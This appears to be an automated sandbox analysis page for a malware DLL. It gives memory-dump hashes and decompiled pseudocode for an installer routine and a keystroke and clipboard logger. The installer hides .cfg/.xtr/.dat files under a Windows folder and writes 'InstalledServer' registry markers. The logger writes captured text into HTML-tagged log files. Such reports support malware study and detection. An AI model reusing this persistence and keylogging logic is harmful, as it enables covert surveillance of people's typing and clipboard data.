Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f526a8682a1746ab478b9ff0de63cbf056aa175396c796edc7b027d709aef71d
Instruction ID: c2faabbd69db4d94be3e596462244fa43c21c6edc70b3a96aead2daf1922e93e
Opcode Fuzzy Hash: f526a8682a1746ab478b9ff0de63cbf056aa175396c796edc7b027d709aef71d
Instruction Fuzzy Hash: 9EC012B22802083EF600CA88CC46FB3329CC348B80F008108F704CA180C0A1BC2046B8

Uniqueness

Uniqueness Score: -1.00%

Function 10004DF0, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
Instruction ID: 5a3873c4f99191ebd0c5874248a48e85116967648e1c4cce01420d804b7247f1
Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
Instruction Fuzzy Hash: 20C012B71A024CAB8B00EEA9CC06D9B33DCAB28609B008825B928CB100C539E5909B60

Uniqueness

Uniqueness Score: -1.00%

Function 10003864, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bafc26852eecdc6c12b55ba738ab9fa026e6a82810d81ad4c3fd3d0f1dab815
Instruction ID: ca28794199431f72530e799d36250414a245c489da467331e40bdcc928d85e60
Opcode Fuzzy Hash: 8bafc26852eecdc6c12b55ba738ab9fa026e6a82810d81ad4c3fd3d0f1dab815
Instruction Fuzzy Hash: 6BC08CFC1052022CBF0AAB3148859BB639CEF801C13408068BA04C4008D634E8814020

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000C080, Relevance: 24.2, Strings: 19, Instructions: 445
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E1000C080(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v40;
				char _v162;
				char _v164;
				intOrPtr _v168;
				char _v290;
				char _v412;
				char _v534;
				char _v656;
				char _v658;
				char _v659;
				char _v660;
				char _v1026;
				char _v1028;
				char _v2011;
				char _v2012;
				void _v5036;
				char _v5040;
				char _v5564;
				char _v5568;
				char _v5572;
				char _v5576;
				char _v5580;
				char _v5584;
				char _v5588;
				char _v5592;
				char _v5596;
				char _v5600;
				char _v5604;
				char _v5608;
				char _v5612;
				char _v5616;
				char _v5620;
				char _v5624;
				char _v5628;
				char _v5632;
				char _v5636;
				char _v5640;
				char _v5644;
				char _v5648;
				char _v5652;
				char _v5656;
				char _v5660;
				char _v5664;
				char _v5668;
				char _v5672;
				char _v5676;
				void* _t153;
				intOrPtr _t188;
				intOrPtr _t195;
				intOrPtr _t197;
				char* _t199;
				intOrPtr _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr* _t206;
				char* _t207;
				char* _t208;
				intOrPtr _t209;
				intOrPtr _t211;
				intOrPtr _t214;
				char* _t217;
				void* _t223;
				void* _t273;
				void* _t287;
				intOrPtr _t328;
				void* _t330;
				intOrPtr* _t403;
				intOrPtr _t412;
				intOrPtr _t419;
				intOrPtr _t446;
				void* _t448;
				void* _t449;
				intOrPtr _t451;
				intOrPtr _t452;
				void* _t460;

				_t451 = _t452;
				_t330 = 0x2c5;
				do {
					_push(0);
					_push(0);
					_t330 = _t330 - 1;
					_t455 = _t330;
				} while (_t330 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t328 = _a4;
				_push(_t451);
				_push(0x1000c850);
				_push( *[fs:eax]);
				 *[fs:eax] = _t452;
				_push("advapi32.dll");
				L10004EE8();
				_push("kernel32.dll");
				L10004EE8();
				_push("shell32.dll");
				L10004EE8();
				_push("mpr.dll");
				L10004EE8();
				_push("version.dll");
				L10004EE8();
				_push("comctl32.dll");
				L10004EE8();
				_push("gdi32.dll");
				L10004EE8();
				_push("opengl32.dll");
				L10004EE8();
				_push("user32.dll");
				L10004EE8();
				_push("wintrust.dll");
				L10004EE8();
				L10004EE8();
				E100050D8();
				_t448 = _t328 + 0x210;
				memcpy( &_v5036, _t448, 0x4e4 << 2);
				_t446 = _t448 + 0x9c8;
				E10005664( &_v5564);
				E100038E0( &_v5040, 0x105,  &_v5564);
				E10003928( &_v5040, 0x105, L"\\Microsoft\\Windows\\", _t455);
				_t153 = E10005690(E1000390C(_v5040), "msimg32.dll");
				_t456 = _t153 - 1;
				if(_t153 != 1) {
					E10005664( &_v5564);
					E100038E0( &_v5592, 0x105,  &_v5564);
					_push(_v5592);
					_push(0x1000c958);
					E100038E0( &_v5596, 0x3d,  &_v1026);
					_push(_v5596);
					_push(L".cfg");
					E100039EC();
					E10005664( &_v5564);
					E100038E0( &_v5600, 0x105,  &_v5564);
					_push(_v5600);
					_push(0x1000c958);
					E100038E0( &_v5604, 0x3d,  &_v1026);
					_push(_v5604);
					_push(L".xtr");
					E100039EC();
					E10005664( &_v5564);
					E100038E0( &_v5608, 0x105,  &_v5564);
					_push(_v5608);
					_push(0x1000c958);
					E100038E0( &_v5612, 0x3d,  &_v1026);
					_push(_v5612);
					_push(L".dat");
					E100039EC();
				} else {
					E10005664( &_v5564);
					E100038E0( &_v5568, 0x105,  &_v5564);
					_push(_v5568);
					_push(L"\\Microsoft\\Windows\\");
					E100038E0( &_v5572, 0x3d,  &_v1026);
					_push(_v5572);
					_push(L".cfg");
					E100039EC();
					E10005664( &_v5564);
					E100038E0( &_v5576, 0x105,  &_v5564);
					_push(_v5576);
					_push(L"\\Microsoft\\Windows\\");
					E100038E0( &_v5580, 0x3d,  &_v1026);
					_push(_v5580);
					_push(L".xtr");
					E100039EC();
					E10005664( &_v5564);
					E100038E0( &_v5584, 0x105,  &_v5564);
					_push(_v5584);
					_push(L"\\Microsoft\\Windows\\");
					E100038E0( &_v5588, 0x3d,  &_v1026);
					_push(_v5588);
					_push(L".dat");
					E100039EC();
				}
				E10006B14(0x2f, _t328, 0x3a, 0x20, _t446, _t448,  &_v5616);
				E100034B0( &_v5628, 0x3d,  &_v1026);
				E1000352C( &_v5624, _v5628, "SOFTWARE\\");
				E100038FC( &_v5620, _v5624);
				E1000577C(0x80000001, _t328, L"ServerStarted", _v5620, _t448, _t456, 2, _v5616);
				_t188 = E10004DF0(0, 0,  &_v1026);
				_v24 = _t188;
				L10004E88();
				if(_t188 == 0xb7) {
					_push(0);
					L10004E38();
				}
				E100038E0( &_v5632, 0x105, _t328);
				_t345 =  &_v8;
				E100099F8(_t328,  &_v8,  &_v5036, _t446, _t448);
				E10009E74(_t328,  &_v5036, _t446, _t448);
				_t458 = _v2011 - 1;
				if(_v2011 == 1) {
					E10005D78(_v8, _t328,  &_v8,  &_v5636, _t446, _t448, _t458);
					E10005F1C(_v5636, _t328,  &_v8, _t448);
					E10005F1C(_v8, _t328, _t345, _t448);
				}
				_t459 = _v1028 - 1;
				if(_v1028 == 1) {
					E100034B0( &_v5648, 0x3d,  &_v1026);
					E1000352C( &_v5644, _v5648, "SOFTWARE\\");
					E100038FC( &_v5640, _v5644);
					E1000577C(0x80000001, _t328, L"ServerName", _v5640, _t448, _t459, 2, _v8);
				}
				_t460 = _v2012 - 1;
				if(_t460 == 0) {
					E100038E0( &_v5652, 0x105, _t328);
					E10003A34(_v5652, _v8);
					if(_t460 != 0) {
						E100038E0( &_v5656, 0x105, _t328);
						_push(_v5656);
						E10005954(0,  &_v5660);
						_pop(_t287);
						E10003A34(_t287, _v5660);
						if(0 != 0) {
							_t448 = 0;
							while(1) {
								_t446 = _t328;
								if(E10005CA4(_t446) != 1 || _t448 >= 5) {
									goto L18;
								}
								_push(0x80);
								_push(_t446);
								L10004F30();
								_push(_t446);
								L10004E30();
								_push(0x1f4);
								L10004F58();
								_t448 = _t448 + 1;
								__eflags = _t448;
							}
						}
					}
				}
				L18:
				_t195 =  *0x1000e10c; // 0x1000f80c
				E10003770(_t195);
				_t197 =  *0x1000e12c; // 0x1000f6a4
				E100038E0(_t197, 0x3d,  &_v656);
				_t199 =  *0x1000e120; // 0x1000f6c2
				 *_t199 = _v659;
				_t200 =  *0x1000e100; // 0x1000f6a8
				E100038E0(_t200, 0x3d,  &_v534);
				_t202 =  *0x1000e110; // 0x1000f6ac
				E100038E0(_t202, 0x3d,  &_v412);
				_t204 =  *0x1000e114; // 0x1000f6b0
				E100038E0(_t204, 0x3d,  &_v290);
				_t206 =  *0x1000e11c; // 0x1000f6bc
				 *_t206 = _v168;
				_t207 =  *0x1000e124; // 0x1000f6c0
				 *_t207 = _v164;
				_t208 =  *0x1000e118; // 0x1000f6c1
				 *_t208 = _v658;
				_t209 =  *0x1000e108; // 0x1000f6b4
				E100038E0(_t209, 0x3d,  &_v1026);
				_t211 =  *0x1000e104; // 0x1000f6b8
				E100038E0(_t211, 0x3d,  &_v162);
				if(_v660 == 1) {
					E100093E4(_t328, _t446, _t448);
				}
				if(_v40 == 1) {
					E1000A480(E1000B634(_t328, _v8, 1, _t448));
				}
				_t214 =  *0x1000a4e8; // 0x1000a534
				E1000A480(E1000AA54(_t214, _t328,  &_v5036, 1, _t446, _t448, _v20));
				while(1) {
					_t217 =  *0x1000e130; // 0x1000e0bc
					_t466 =  *_t217;
					if( *_t217 != 0) {
						break;
					}
					E10006058();
				}
				E10008D4C(_t217);
				_t403 =  *0x1000e10c; // 0x1000f80c
				E100037D0( &_v12,  *_t403);
				_push(0x80);
				_t223 = E1000390C(_v16);
				_t329 = _t223;
				_push(_t223);
				L10004F30();
				E10005EB4(_t223,  &_v5036, 0x1390, 0);
				E100034B0( &_v5672, 0x3d,  &_v1026);
				E1000352C( &_v5668, _v5672, "SOFTWARE\\");
				E100038FC( &_v5664, _v5668);
				E1000577C(0x80000001, _t329, L"InstalledServer", _v5664, _t448, _t466, 2, _v8);
				_push(E1000391C(_v12) + _t236);
				E10004584();
				_push(E1000391C(_v12) + _t241);
				E100050D0(_v28, E1000390C(_v12));
				if(0 == 0) {
					_t449 = 0;
					do {
						E10005954(0,  &_v5676);
						_t273 = E1000BD60(_v28, _t329, _v5676, _t446, _t449, 0);
						_t449 = _t449 + 1;
					} while (_t449 <= 0xa && _t273 != 1);
				}
				_push(_v24);
				L10004DC0();
				L10004E38();
				_t412 = 0;
				 *[fs:eax] = _t412;
				_push(E1000C85A);
				E10003770( &_v5676);
				E100032F0( &_v5672, 2);
				E10003788( &_v5664, 4);
				E100032F0( &_v5648, 2);
				E10003788( &_v5640, 3);
				E100032F0( &_v5628, 2);
				E10003788( &_v5620, 0xe);
				E10003770( &_v5040);
				_t419 =  *0x1000bd14; // 0x1000bd18
				E10004590( &_v28, _t419);
				return E10003788( &_v20, 4);
			}

0x1000c081
0x1000c083
0x1000c088
0x1000c088
0x1000c08a
0x1000c08c
0x1000c08c
0x1000c08c
0x1000c08f
0x1000c090
0x1000c091
0x1000c092
0x1000c097
0x1000c098
0x1000c09d
0x1000c0a0
0x1000c0a3
0x1000c0a8
0x1000c0ad
0x1000c0b2
0x1000c0b7
0x1000c0bc
0x1000c0c1
0x1000c0c6
0x1000c0cb
0x1000c0d0
0x1000c0d5
0x1000c0da
0x1000c0df
0x1000c0e4
0x1000c0e9
0x1000c0ee
0x1000c0f3
0x1000c0f8
0x1000c0fd
0x1000c102
0x1000c10c
0x1000c11c
0x1000c121
0x1000c132
0x1000c132
0x1000c13a
0x1000c150
0x1000c160
0x1000c170
0x1000c175
0x1000c177
0x1000c298
0x1000c2ae
0x1000c2b3
0x1000c2b9
0x1000c2cf
0x1000c2d4
0x1000c2da
0x1000c2e7
0x1000c2f2
0x1000c308
0x1000c30d
0x1000c313
0x1000c329
0x1000c32e
0x1000c334
0x1000c341
0x1000c34c
0x1000c362
0x1000c367
0x1000c36d
0x1000c383
0x1000c388
0x1000c38e
0x1000c39d
0x1000c17d
0x1000c183
0x1000c199
0x1000c19e
0x1000c1a4
0x1000c1ba
0x1000c1bf
0x1000c1c5
0x1000c1d2
0x1000c1dd
0x1000c1f3
0x1000c1f8
0x1000c1fe
0x1000c214
0x1000c219
0x1000c21f
0x1000c22c
0x1000c237
0x1000c24d
0x1000c252
0x1000c258
0x1000c26e
0x1000c273
0x1000c279
0x1000c288
0x1000c288
0x1000c3b5
0x1000c3d4
0x1000c3ea
0x1000c3fb
0x1000c410
0x1000c420
0x1000c425
0x1000c428
0x1000c432
0x1000c434
0x1000c436
0x1000c436
0x1000c448
0x1000c453
0x1000c45c
0x1000c46a
0x1000c46f
0x1000c476
0x1000c481
0x1000c48c
0x1000c494
0x1000c494
0x1000c499
0x1000c4a0
0x1000c4b9
0x1000c4cf
0x1000c4e0
0x1000c4f5
0x1000c4f5
0x1000c4fa
0x1000c501
0x1000c514
0x1000c522
0x1000c527
0x1000c536
0x1000c541
0x1000c54a
0x1000c555
0x1000c556
0x1000c55b
0x1000c55d
0x1000c57d
0x1000c57d
0x1000c588
0x00000000
0x00000000
0x1000c561
0x1000c566
0x1000c567
0x1000c56c
0x1000c56d
0x1000c572
0x1000c577
0x1000c57c
0x1000c57c
0x1000c57c
0x1000c57d
0x1000c55b
0x1000c527
0x1000c58f
0x1000c58f
0x1000c594
0x1000c599
0x1000c5a9
0x1000c5ae
0x1000c5b9
0x1000c5bb
0x1000c5cb
0x1000c5d0
0x1000c5e0
0x1000c5e5
0x1000c5f5
0x1000c5fa
0x1000c605
0x1000c607
0x1000c612
0x1000c614
0x1000c61f
0x1000c621
0x1000c631
0x1000c636
0x1000c646
0x1000c652
0x1000c654
0x1000c654
0x1000c65d
0x1000c66e
0x1000c66e
0x1000c67f
0x1000c689
0x1000c695
0x1000c695
0x1000c69a
0x1000c69d
0x00000000
0x00000000
0x1000c690
0x1000c690
0x1000c69f
0x1000c6a7
0x1000c6af
0x1000c6b4
0x1000c6bc
0x1000c6c1
0x1000c6c3
0x1000c6c4
0x1000c6d8
0x1000c6f4
0x1000c70a
0x1000c71b
0x1000c730
0x1000c73f
0x1000c74e
0x1000c760
0x1000c76f
0x1000c778
0x1000c77a
0x1000c77c
0x1000c784
0x1000c792
0x1000c797
0x1000c798
0x1000c77c
0x1000c7a4
0x1000c7a5
0x1000c7ac
0x1000c7b3
0x1000c7b6
0x1000c7b9
0x1000c7c4
0x1000c7d4
0x1000c7e4
0x1000c7f4
0x1000c804
0x1000c814
0x1000c824
0x1000c82f
0x1000c837
0x1000c83d
0x1000c84f

Strings

mpr.dll, xrefs: 1000C0C1
.xtr, xrefs: 1000C21F, 1000C334
msimg32.dll, xrefs: 1000C107
version.dll, xrefs: 1000C0CB
wintrust.dll, xrefs: 1000C0FD
gdi32.dll, xrefs: 1000C0DF
SOFTWARE\, xrefs: 1000C3E5, 1000C4CA, 1000C705
ServerName, xrefs: 1000C4EB
comctl32.dll, xrefs: 1000C0D5
opengl32.dll, xrefs: 1000C0E9
ServerStarted, xrefs: 1000C406
.cfg, xrefs: 1000C1C5, 1000C2DA
kernel32.dll, xrefs: 1000C0AD
advapi32.dll, xrefs: 1000C0A3
\Microsoft\Windows\, xrefs: 1000C15B, 1000C1A4, 1000C1FE, 1000C258
.dat, xrefs: 1000C279, 1000C38E
user32.dll, xrefs: 1000C0F3
InstalledServer, xrefs: 1000C726
shell32.dll, xrefs: 1000C0B7

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: .cfg$.dat$.xtr$InstalledServer$SOFTWARE\$ServerName$ServerStarted$\Microsoft\Windows\$advapi32.dll$comctl32.dll$gdi32.dll$kernel32.dll$mpr.dll$msimg32.dll$opengl32.dll$shell32.dll$user32.dll$version.dll$wintrust.dll
API String ID: 0-3293355523
Opcode ID: bde0dd1c3b5265f9cabb2d91f526b3a14c8d9b38cf1c088a702092fb281a6550
Instruction ID: 1bb01a822c3cd363219a61f58cecc4d3cd4d7df1aa5892b4b649a7b9097d74e2
Opcode Fuzzy Hash: bde0dd1c3b5265f9cabb2d91f526b3a14c8d9b38cf1c088a702092fb281a6550
Instruction Fuzzy Hash: 58128D7890025D9BEB21DB50CC82EDEB3B9EF84381F4080E5E5096B299DB71BF858F55

Uniqueness

Uniqueness Score: -1.00%

Function 10008568, Relevance: 14.2, Strings: 11, Instructions: 407
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E10008568(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v300;
				intOrPtr _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t109;
				intOrPtr _t110;
				void* _t119;
				intOrPtr _t131;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t154;
				char _t168;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t206;
				intOrPtr _t225;
				intOrPtr _t233;
				intOrPtr _t242;
				intOrPtr _t243;
				void* _t244;
				void* _t245;
				intOrPtr _t248;
				intOrPtr _t259;
				intOrPtr _t266;
				intOrPtr _t278;
				intOrPtr _t279;
				intOrPtr _t280;
				intOrPtr _t305;
				intOrPtr _t307;
				intOrPtr _t308;
				void* _t310;

				_t304 = __esi;
				_t303 = __edi;
				_t307 = _t308;
				_t245 = 0x2f;
				do {
					_push(0);
					_push(0);
					_t245 = _t245 - 1;
				} while (_t245 != 0);
				_push(_t245);
				_push(__ebx);
				_push(__esi);
				_t242 = _a16;
				_t100 = _a8;
				_push(_t307);
				_push(0x10008ba5);
				_push( *[fs:edx]);
				 *[fs:edx] = _t308;
				_t310 = _t100 -  *0x1000f68c; // 0xc1b9
				if(_t310 != 0) {
					__eflags = _t100 -  *0x1000f690; // 0xc1ba
					if(__eflags != 0) {
						__eflags = _t100 -  *0x1000f694; // 0xc1bc
						if(__eflags != 0) {
							__eflags = _t100 -  *0x1000f698; // 0x0
							if(__eflags != 0) {
								__eflags = _t100 -  *0x1000f69c; // 0xc1bd
								if(__eflags != 0) {
									__eflags = _t100 - 0x308;
									if(_t100 != 0x308) {
										__eflags = _t100 -  *0x1000f6a0; // 0xc1be
										if(__eflags != 0) {
											_push(_t242);
											_push(_a12);
											_push(_t100);
											_t101 = _a4;
											_push(_t101);
											L10004FE0();
											_v8 = _t101;
										} else {
											__eflags =  *0x1000e0b8;
											if( *0x1000e0b8 != 0) {
												_push(0);
												_push(0);
												_push(0);
												_t109 =  *0x1000e0b8; // 0x0
												_push(_t109);
												L10004F38();
												_t110 =  *0x1000e0b8; // 0x0
												_push(_t110);
												L10004F18();
												 *0x1000f6c4 = 0;
												 *0x1000f6c8 = 0;
												__eflags =  *0x1000f6c1 - 1;
												if(__eflags == 0) {
													E10006710( &_v380, _t245, 0,  *0x1000f6c4,  *0x1000f6c8);
													_t248 =  *0x1000f6b4; // 0x0
													E10003988( &_v384, _t248, L"SOFTWARE\\", __eflags);
													E1000577C(0x80000001, _t242, L"LastSize", _v384, __esi, __eflags, 2, _v380);
												}
											}
										}
									} else {
										__eflags =  *0x1000f6d4;
										if( *0x1000f6d4 != 0) {
											_t119 = E100069DC(0, _t242,  &_v12, __esi);
											__eflags = _t119 - 1;
											if(_t119 == 1) {
												_t266 =  *0x1000e0b4; // 0x0
												E10003A34(_v12, _t266);
												if(__eflags != 0) {
													E100037AC(0x1000e0b4, _v12);
													E10008270(L"\r\n\r\n", _t242,  &_v352, __edi, _t304);
													_push(_v352);
													_push(L"<FONT COLOR=\"red\">[Clipboard");
													_push(L" --- ");
													E10006B14(0x2f, _t242, 0x3a, 0x20, __edi, _t304,  &_v356);
													_push(_v356);
													_push(L"]</font>");
													E10008270(0x10008bcc, _t242,  &_v360, _t303, _t304);
													_push(_v360);
													_t131 =  *0x1000e0b4; // 0x0
													E10008270(_t131, _t242,  &_v364, _t303, _t304);
													_push(_v364);
													E10008270(0x10008bcc, _t242,  &_v368, _t303, _t304);
													_push(_v368);
													_push(L"<FONT COLOR=\"red\">[Clipboard End]</font>");
													E10008270(L"\r\n\r\n", _t242,  &_v372, _t303, _t304);
													_push(_v372);
													E100039EC();
													__eflags =  *0x1000e0b8 - 0xffffffff;
													if(__eflags != 0) {
														E100061F8(_v12,  &_v376, __eflags);
														E100037D0( &_v12, _v376);
														_push(0);
														_push( &_v32);
														_t147 = E1000391C(_v12) + _t146;
														__eflags = _t147;
														_push(_t147);
														_push(_v12);
														_t149 =  *0x1000e0b8; // 0x0
														_push(_t149);
														L10004FA0();
													}
													E100037AC(0x1000f6d0, L"qualquercoisarsrsr");
												}
											}
										}
									}
								} else {
									__eflags =  *0x1000f6d4;
									if( *0x1000f6d4 != 0) {
										_t150 =  *0x1000f69c; // 0xc1bd
										_v8 = _t150 + 1;
									}
								}
							} else {
								__eflags =  *0x1000f6d4;
								if( *0x1000f6d4 != 0) {
									_t100 =  *0x1000f6d4; // 0x0
									_push(_t100);
									L100050B8();
								}
								_push(0);
								_push(0);
								L10004EA0();
								_push(_t100);
								_push(E10008040);
								_push(0xd);
								L100050A0();
								 *0x1000f6d4 = E10008040;
							}
						} else {
							__eflags =  *0x1000f6d4;
							if( *0x1000f6d4 != 0) {
								_t154 =  *0x1000f6d4; // 0x0
								_push(_t154);
								L100050B8();
							}
							 *0x1000f6d4 = 0;
						}
						goto L42;
					} else {
						E10003770( &_v12);
						__eflags =  *0x1000f6d4;
						if( *0x1000f6d4 != 0) {
							_t189 =  *0x1000f6d4; // 0x0
							_push(_t189);
							L100050B8();
						}
						__eflags =  *0x1000e0b8 - 0xffffffff;
						if(__eflags != 0) {
							_push(0);
							_push(0);
							_push(0);
							_t178 =  *0x1000e0b8; // 0x0
							_push(_t178);
							L10004F38();
							_push(0);
							_t179 =  *0x1000e0b8; // 0x0
							_push(_t179);
							L10004E80();
							__eflags = 0;
							_v28 = _t179;
							_v24 = 0;
							E10003BE4( &_v12, E10003FD4(_v28, _v24, 2, 0));
							_push(0);
							_push( &_v32);
							_push(_v28);
							_push(_v12);
							_t187 =  *0x1000e0b8; // 0x0
							_push(_t187);
							L10004F00();
							_push(2);
							_push(0);
							_push(0);
							_t188 =  *0x1000e0b8; // 0x0
							_push(_t188);
							L10004F38();
						}
						_push(0x80);
						_t278 =  *0x1000f684; // 0x0
						E10003988( &_v336, L"temp", _t278, __eflags);
						_push(E1000390C(_v336));
						L10004F30();
						_t279 =  *0x1000f684; // 0x0
						E10003988( &_v340, L"temp", _t279, __eflags);
						_push(E1000390C(_v340));
						L10004E30();
						_push(0);
						_push(0);
						_push(2);
						_push(0);
						_push(0);
						_push(0x40000000);
						_t280 =  *0x1000f684; // 0x0
						E10003988( &_v344, L"temp", _t280, __eflags);
						_t168 = E1000390C(_v344);
						_push(_t168);
						L10004DE0();
						_t243 = _t168;
						__eflags = _t243 - 0xffffffff;
						if(__eflags != 0) {
							E100061F8(_v12,  &_v348, __eflags);
							E100037D0( &_v12, _v348);
							_push(0);
							_push( &_v32);
							_t177 = E1000391C(_v12) + _t176;
							__eflags = _t177;
							_push(_t177);
							_t168 = _v12;
							_push(_t168);
							_push(_t243);
							L10004FA0();
						}
						_push(_t243);
						L10004DC0();
						_push(0);
						_push(0);
						L10004EA0();
						_push(_t168);
						_push(E10008040);
						_push(0xd);
						L100050A0();
						 *0x1000f6d4 = E10008040;
						L42:
						_pop(_t259);
						 *[fs:eax] = _t259;
						_push(E10008BAC);
						E10003788( &_v384, 0x13);
						E10003788( &_v40, 2);
						return E10003788( &_v16, 2);
					}
				}
				_t305 = _t242;
				E100050D0( &_v308, _t305);
				_push(0x8000);
				_push(0);
				_push(_t305);
				L10004F80();
				E10006E78(_t242, __edi, _t305,  &_v36, _v308, _v304,  &_v300, _v44);
				E100037D0( &_v40, _v36);
				E10006974( &_v16);
				_t244 = E10008438(_v16, _t242, __edi, _t305);
				_t206 =  *0x1000f6d0; // 0x0
				E10003A34(_t206, _v16);
				if(_t310 == 0) {
					L6:
					E10003770( &_v16);
					L7:
					E10003A34(_v40, 0);
					if(0 != 0) {
						_t313 = _t244 - 1;
						if(_t244 == 1) {
							E10008270(_v36, _t244,  &_v328, _t303, _t305);
							E10003988( &_v12, _v328, _v16, _t313);
							_t314 =  *0x1000e0b8 - 0xffffffff;
							if( *0x1000e0b8 != 0xffffffff) {
								E100061F8(_v12,  &_v332, _t314);
								E100037D0( &_v12, _v332);
								_push(0);
								_push( &_v32);
								_push(E1000391C(_v12) + _t222);
								_push(_v12);
								_t225 =  *0x1000e0b8; // 0x0
								_push(_t225);
								L10004FA0();
							}
						}
					}
					goto L42;
				}
				E10003A34(_v40, 0);
				if(0 == 0) {
					goto L6;
				} else {
					E100037AC(0x1000f6d0, _v16);
					_push(L"\r\n\r\n");
					_push(_v16);
					_push(0x10008bcc);
					_push(_v36);
					E100039EC();
					E10008270(L"\r\n\r\n", _t244,  &_v312, _t303, _t305);
					_push(_v312);
					_push(L"<FONT COLOR=\"blue\">[");
					_t233 =  *0x1000f6d0; // 0x0
					E10008270(_t233, _t244,  &_v316, _t303, _t305);
					_push(_v316);
					_push(0x10008c08);
					_push(L" --- ");
					E10006B14(0x2f, _t244, 0x3a, 0x20, _t303, _t305,  &_v320);
					_push(_v320);
					_push(L"</font>");
					E10008270(0x10008bcc, _t244,  &_v324, _t303, _t305);
					_push(_v324);
					E100039EC();
					goto L7;
				}
			}

0x10008568
0x10008568
0x10008569
0x1000856b
0x10008570
0x10008570
0x10008572
0x10008574
0x10008574
0x10008577
0x10008578
0x10008579
0x1000857a
0x1000857d
0x10008582
0x10008583
0x10008588
0x1000858b
0x1000858e
0x10008594
0x1000875b
0x10008761
0x100088e3
0x100088e9
0x1000890b
0x10008911
0x10008948
0x1000894e
0x1000896b
0x10008970
0x10008abc
0x10008ac2
0x10008b5b
0x10008b5f
0x10008b60
0x10008b61
0x10008b64
0x10008b65
0x10008b6a
0x10008ac8
0x10008ac8
0x10008acf
0x10008ad5
0x10008ad7
0x10008ad9
0x10008adb
0x10008ae0
0x10008ae1
0x10008ae6
0x10008aeb
0x10008aec
0x10008af1
0x10008afb
0x10008b05
0x10008b0c
0x10008b20
0x10008b34
0x10008b3f
0x10008b54
0x10008b54
0x10008b0c
0x10008acf
0x10008976
0x10008976
0x1000897d
0x10008988
0x1000898d
0x1000898f
0x10008998
0x1000899e
0x100089a3
0x100089b1
0x100089c1
0x100089c6
0x100089cc
0x100089d1
0x100089e9
0x100089ee
0x100089f4
0x10008a04
0x10008a09
0x10008a15
0x10008a1a
0x10008a1f
0x10008a30
0x10008a35
0x10008a3b
0x10008a4b
0x10008a50
0x10008a5e
0x10008a63
0x10008a6a
0x10008a75
0x10008a83
0x10008a88
0x10008a8d
0x10008a96
0x10008a96
0x10008a98
0x10008a9c
0x10008a9d
0x10008aa2
0x10008aa3
0x10008aa3
0x10008ab2
0x10008ab2
0x100089a3
0x1000898f
0x1000897d
0x10008950
0x10008950
0x10008957
0x1000895d
0x10008963
0x10008963
0x10008957
0x10008913
0x10008913
0x1000891a
0x1000891c
0x10008921
0x10008922
0x10008922
0x10008927
0x10008929
0x1000892b
0x10008930
0x10008936
0x10008937
0x10008939
0x1000893e
0x1000893e
0x100088eb
0x100088eb
0x100088f2
0x100088f4
0x100088f9
0x100088fa
0x100088fa
0x10008901
0x10008901
0x00000000
0x10008767
0x1000876a
0x1000876f
0x10008776
0x10008778
0x1000877d
0x1000877e
0x1000877e
0x10008783
0x1000878a
0x1000878c
0x1000878e
0x10008790
0x10008792
0x10008797
0x10008798
0x1000879d
0x1000879f
0x100087a4
0x100087a5
0x100087aa
0x100087ac
0x100087af
0x100087c6
0x100087cb
0x100087d0
0x100087d4
0x100087d8
0x100087d9
0x100087de
0x100087df
0x100087e4
0x100087e6
0x100087e8
0x100087ea
0x100087ef
0x100087f0
0x100087f0
0x100087f5
0x10008805
0x1000880b
0x1000881b
0x1000881c
0x1000882c
0x10008832
0x10008842
0x10008843
0x10008848
0x1000884a
0x1000884c
0x1000884e
0x10008850
0x10008852
0x10008862
0x10008868
0x10008873
0x10008878
0x10008879
0x1000887e
0x10008880
0x10008883
0x1000888e
0x1000889c
0x100088a1
0x100088a6
0x100088af
0x100088af
0x100088b1
0x100088b2
0x100088b5
0x100088b6
0x100088b7
0x100088b7
0x100088bc
0x100088bd
0x100088c2
0x100088c4
0x100088c6
0x100088cb
0x100088d1
0x100088d2
0x100088d4
0x100088d9
0x10008b6d
0x10008b6f
0x10008b72
0x10008b75
0x10008b85
0x10008b92
0x10008ba4
0x10008ba4
0x10008761
0x100085a5
0x100085aa
0x100085af
0x100085b4
0x100085b6
0x100085b7
0x100085db
0x100085e6
0x100085ee
0x100085fb
0x100085fd
0x10008605
0x1000860a
0x100086cd
0x100086d0
0x100086d5
0x100086da
0x100086df
0x100086e5
0x100086e8
0x100086f7
0x10008708
0x1000870d
0x10008714
0x10008723
